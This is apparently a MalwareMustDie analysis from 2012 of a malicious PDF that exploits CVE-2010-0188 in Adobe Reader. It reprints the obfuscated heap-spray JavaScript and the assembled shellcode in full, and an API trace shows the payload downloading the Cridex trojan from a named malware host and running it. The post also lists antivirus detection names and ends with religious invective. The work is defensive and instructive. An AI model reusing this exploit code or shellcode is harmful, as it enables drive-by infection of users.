- while (_l8.length * 2 < _l9)_l8 += _l8;
- return _l8.substring(0, _l9 / 2)
- }
- function _I0(_I1)
- {
- _I1 = unescape(_I1);
- roteDak = _I1.length * 2;
- dakRote = unescape('%u9090');
- spray = _l7(dakRote, 0x2000 - roteDak);
- loxWhee = _I1 + spray;
- loxWhee = _l7(loxWhee, 524098);
- for (i = 0; i < 400; i ++ )_l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
- }
- function _I2(_I1, len)
- {
- while (_I1.length < len)_I1 += _I1;
- return _I1.substring(0, len)
- }
- function _I3(_I1)
- {
- ret = '';
- for (i = 0; i < _I1.length; i += 2)
- {
- b = _I1.substr(i, 2);
- c = parseInt(b, 16);
- ret += String.fromCharCode(c);
- }
- return ret
- }
- function _ji1(_I1, _I4)
- {
- _I5 = '';
- for (_I6 = 0; _I6 < _I1.length; _I6 ++ )
- {
- _l9 = _I4.length;
- _I7 = _I1.charCodeAt(_I6);
- _I8 = _I4.charCodeAt(_I6 % _l9);
- _I5 += String.fromCharCode(_I7 ^ _I8);
- }
- return _I5
- }
- function _I9(_I6)
- {
- _j0 = _I6.toString(16);
- _j1 = _j0.length;
- _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
- return _I5
- }
- function _j2(_I1)
- {
- _I5 = '';
- for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
- {
- _I5 += '%u';
- _I5 += _I9(_I1.charCodeAt(_I6 + 1));
- _I5 += _I9(_I1.charCodeAt(_I6))
- }
- return _I5
- }
- function _j3()
- {
- _j4 = _l5();
- if (_j4 < 9000)
- {
- _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
- _j6 = _l1;
- _j7 = _I3(_j6)
- }
- else
- {
- _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
- _j6 = _l2;
- _j7 = _I3(_j6)
- }
- _j8 = 'SUkqADggAABB';
- _j9 = _I2('QUFB', 10984);
- _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
- _ll1 = _j8 + _j9 + _ll0 + _j5;
- _ll2 = _ji1(_j7, '');
- if (_ll2.length % 2)_ll2 += unescape('%00');
- _ll3 = _j2(_ll2);
- with (
- {
- k : _ll3
- }
- )_I0(k);
- ImageField1.rawValue = _ll1
- }
- _j3();
- ====================================
- EXPLOIT IS DETECTED IN....
- =====================================
- // Oh, see the code of "ImageField1.rawValue" near the end of the script,
- // It is the method used to exploit Libtiff integer overflow in Adobe Reader and Acrobat (PoC)
- // CVE-2010-0188, the below function is the actual code be used for this exploitation:
- function _j3()
- {
- _j4 = _l5();
- if (_j4 < 9000)
- {
- _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
- _j6 = _l1;
- _j7 = _I3(_j6)
- }
- else
- {
- _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
- _j6 = _l2;
- _j7 = _I3(_j6)
- }
- _j8 = 'SUkqADggAABB';
- _j9 = _I2('QUFB', 10984);
- _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
- _ll1 = _j8 + _j9 + _ll0 + _j5;
- _ll2 = _ji1(_j7, '');
- if (_ll2.length % 2)_ll2 += unescape('%00');
- _ll3 = _j2(_ll2);
- with (
- {
- k : _ll3
- }
- )_I0(k);
- ImageField1.rawValue = _ll1
- // In this case we have a single exploitation only.
- ====================================
- SHELLCODE DETECTED IN....
- ; Post-exploit must be followed by infection act
- ; method used are usually shellcode,
- ; where is it?
- =====================================
- // See the below code;
- app.alert = event.target.creationDate.split('|')[1].replace(/; /g, '');
- var padding;
- var bbb, ccc, ddd, eee, fff, ggg, hhh;
- var pointers_a, i;
- var x = new Array();
- var y = new Array();
- var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
- var _l2 = "4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
- // it called the SECOND ARRAY OF a; that we splitted before (I wrote it again below:)
- 6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f64656c656d6961746f722e72753a383038302f666f72756d2f6c696e6b732f636f6c756d6e2e7068703f6b73636e68637a3d33303a316e3a31693a31693a3333266973716a743d32763a316b3a316d3a33323a33333a316b3a316b3a33313a316a3a316f26686d786f77783d3169266467616d777278783d6c7466766d267869647570793d6a6a6e71686c0000
- //with adding the first parts
- //with: "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"
- // so this is the real shellcode strings will be...
- 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f64656c656d6961746f722e72753a383038302f666f72756d2f6c696e6b732f636f6c756d6e2e7068703f6b73636e68637a3d33303a316e3a31693a31693a3333266973716a743d32763a316b3a316d3a33323a33333a316b3a316b3a33313a316a3a316f26686d786f77783d3169266467616d777278783d6c7466766d267869647570793d6a6a6e71686c0000
- // These moronz think they are smart enough to split the binary of shellcode,
- // but we are smarter.
- //In the binary editor you can see the shellcode like below:
- 4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a L.`....J<.`..c.J
- a3 eb 80 4a 30 20 82 4a 6e 2f 80 4a 41 41 41 41 ...J0..Jn/.JAAAA
- 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &...............
- 12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41 41 .9.Jd.`.....AAAA
- 41 41 41 41 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 AAAAf......u4._3
- c0 64 8b 40 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 .d.@0.@..p.V.v.3
- db 66 8b 5e 3c 03 74 33 2c 81 ee 15 10 ff ff b8 .f.^<.t3,.......
- 8b 40 30 c3 46 39 06 75 fb 87 34 24 85 e4 75 51 .@0.F9.u..4$..uQ
- e9 eb 4c 51 56 8b 75 3c 8b 74 35 78 03 f5 56 8b ..LQV.u<.t5x..V.
- 76 20 03 f5 33 c9 49 41 fc ad 03 c5 33 db 0f be v...3.IA....3...
- 10 38 f2 74 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 .8.t......@..;.u
- e6 5e 8b 5e 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 .^.^$..f..K.F..T
- 24 0c 8b d8 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb $...........^Y..
- 53 ad 8b 68 20 80 7d 0c 33 74 03 96 eb f3 8b 68 S..h..}.3t.....h
- 08 8b f7 6a 05 59 e8 98 ff ff ff e2 f9 e8 00 00 ...j.Y..........
- 00 00 58 50 6a 40 68 ff 00 00 00 50 83 c0 19 50 ..XPj@h....P...P
- 55 8b ec 8b 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 U...^......hon..
- 68 75 72 6c 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff hurlmT........a.
- ff ff eb 02 eb 72 81 ec 04 01 00 00 8d 5c 24 0c .....r.......\$.
- c7 04 24 72 65 67 73 c7 44 24 04 76 72 33 32 c7 ..$regs.D$.vr32.
- 44 24 08 20 2d 73 20 53 68 f8 00 00 00 ff 56 0c D$..-s.Sh.....V.
- 8b e8 33 c9 51 c7 44 1d 00 77 70 62 74 c7 44 1d ..3.Q.D..wpbt.D.
- 05 2e 64 6c 6c c6 44 1d 09 00 59 8a c1 04 30 88 ..dll.D...Y...0.
- 44 1d 04 41 51 6a 00 6a 00 53 57 6a 00 ff 56 14 D..AQj.j.SWj..V.
- 85 c0 75 16 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ..u.j.S.V.j....S
- ff 56 04 83 c3 0c eb 02 eb 13 47 80 3f 00 75 fa .V........G.?.u.
- 47 80 3f 00 75 c4 6a 00 6a fe ff 56 08 e8 9c fe G.?.u.j.j..V....
- ff ff 8e 4e 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca ...N.......o..3.
- 8a 5b 1b c6 46 79 36 1a 2f 70 68 74 74 70 3a 2f .[..Fy6./phttp:/
- 2f 64 65 6c 65 6d 69 61 74 6f 72 2e 72 75 3a 38 /delemiator.ru:8
- 30 38 30 2f 66 6f 72 75 6d 2f 6c 69 6e 6b 73 2f 080/forum/links/
- 63 6f 6c 75 6d 6e 2e 70 68 70 3f 6b 73 63 6e 68 column.php?kscnh
- 63 7a 3d 33 30 3a 31 6e 3a 31 69 3a 31 69 3a 33 cz=30:1n:1i:1i:3
- 33 26 69 73 71 6a 74 3d 32 76 3a 31 6b 3a 31 6d 3&isqjt=2v:1k:1m
- 3a 33 32 3a 33 33 3a 31 6b 3a 31 6b 3a 33 31 3a :32:33:1k:1k:31:
- 31 6a 3a 31 6f 26 68 6d 78 6f 77 78 3d 31 69 26 1j:1o&hmxowx=1i&
- 64 67 61 6d 77 72 78 78 3d 6c 74 66 76 6d 26 78 dgamwrxx=ltfvm&x
- 69 64 75 70 79 3d 6a 6a 6e 71 68 6c 00 00 idupy=jjnqhl..
- ================================
- DOWNLOAD URL OF PAYLOAD
- AND INFECTION METHOD....
- ================================
- // The url for download the payload, which lead us to Cridex,
- // is plainly written in the shellcode as per below URL:
- ----------------------------------------
- h00p://delemiator.ru:8080/forum/links/column.php?kscnhcz=30:1n:1i:1i:33&isqjt=2v:1k:1m:32:33:1k:1k:31:1j:1o&hmxowx=1i&dgamwrxx=ltfvm&xidupy=jjnqhl
- ----------------------------------------
- //↑ here it is this SOB's trying to hide's URL..
- //The infection performed by this shellcode is
- //with API by using OS's component library as kernel32.dll , urlmon.DLL, and regsvr32.exe ,to make an infection
- // as per below breakdowns:
- 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://delemiator.ru:8080/forum/links/column.php?kscnhcz=30:1n:1i:1i:33&isqjt=2v:1k:1m:32:33:1k:1k:31:1j:1o&hmxowx=1i&dgamwrxx=ltfvm&xidupy=jjnqhl, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
- 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
- // It made memory alloc, loading urlmon, downloads the Cridex trojan, saved it,
- // executed it, and register it in registry with regsvr32 ...
- ================================================
- CURRENT DETECTION OF ANTIVIRUS IS ??
- ================================================
- //It has a "not bad detection" VT Score is (20 / 44)
- //
- // But you'll now know for sure of what exploitation used if you
- // hit by this mess, because it shows the below "not so comprehensive" malware names..
- // We saw that only F-Secure is making a good name of it.
- F-Secure : Exploit:W32/CVE-2010-0188.B
- DrWeb : Exploit.PDF.3096
- Microsoft : Exploit:Win32/Pdfjsc.AEB
- VIPRE : LooksLike.PDF.Malware.c (v)
- AntiVir : EXP/Pdfjsc.aeb
- TrendMicro : TROJ_PIDIEF.SMWY
- McAfee-GW-Edition : Exploit-PDF!Blacole.o
- TrendMicro-HouseCall : TROJ_GEN.F47V1125
- MicroWorld-eScan : Exploit.TIFF.Gen
- Avast : JS:Pdfka-gen [Expl]
- nProtect : Exploit.TIFF.Gen
- GData : Exploit.TIFF.Gen
- Kaspersky : HEUR:Exploit.Script.Generic
- BitDefender : Exploit.TIFF.Gen
- McAfee : Exploit-PDF!Blacole.o
- ESET-NOD32 : JS/Exploit.Pdfka.PWF
- Ikarus : Exploit.PDF
- AVG : Exploit_c.VVV
- Sophos : Troj/PDFJs-AAS
- Comodo : TestSignature.JS.Pdfka.FBQ
- // .. We swore,
- // .. the sweat, tears & blood of a crusader in act, is like a martyr.. one died & shall be replaced by 10 more..
- // .. bless & glory to those who stick to fight for the truth 'till the end..
- // .. shall we be mocked or broken in fighting, the curse is upon you, malware moronz! By the name of God.
- // .. with curse that shall last foverer, a curse for those enemies of God..
- // ..
- // .. Yet,is not too late to stop your evil works. Ask for forgiveness and stop your act.
- // ..
- ---
- #MalwareMustDie
- @unixfreaxjp /malware]$ date
- Mon Nov 26 21:12:33 JST 2012
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement